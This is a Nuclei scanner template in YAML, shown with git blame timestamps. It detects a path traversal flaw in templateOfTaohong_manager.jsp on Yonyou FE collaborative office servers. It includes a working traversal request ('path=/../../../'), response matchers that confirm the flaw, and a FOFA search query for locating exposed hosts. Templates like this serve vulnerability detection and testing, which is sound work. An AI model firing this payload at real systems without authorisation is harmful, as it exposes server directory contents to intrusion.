nuclei-templates/http/vulnerabilities/yonyou/yonyou-fe-directory-travers...

35 lines
1.4 KiB
YAML
Raw Permalink Normal View History

2023-08-18 03:22:06 +00:00
id: yonyou-fe-directory-traversal
info:
2023-09-15 12:23:57 +00:00
name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: medium
2023-09-15 12:23:57 +00:00
description: |
There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
2023-08-18 03:22:06 +00:00
reference:
2023-09-15 12:23:57 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
fofa-query: FE协作
2023-09-15 12:23:57 +00:00
tags: yonyou,fe,lfi
2023-08-18 03:22:06 +00:00
http:
2023-09-15 12:23:57 +00:00
- method: GET
path:
- "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
2023-08-18 03:22:06 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "window.location=\"templateOfTaohong_manager.jsp?path=\""
- "var next=window.confirm(\"确定删除文件吗?\");"
2023-09-15 12:23:57 +00:00
condition: and
2023-08-18 03:22:06 +00:00
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
# digest: 490a00463044022032ee92d9fa95098d36f55967b810e733df8be03445c2dd5e805d8d0c82a4914002205ee8886037bdbae602646118843e95fd4a076fd77f4239484844c647fe8c58e9:922c64590222798bb761d5b6d8e72950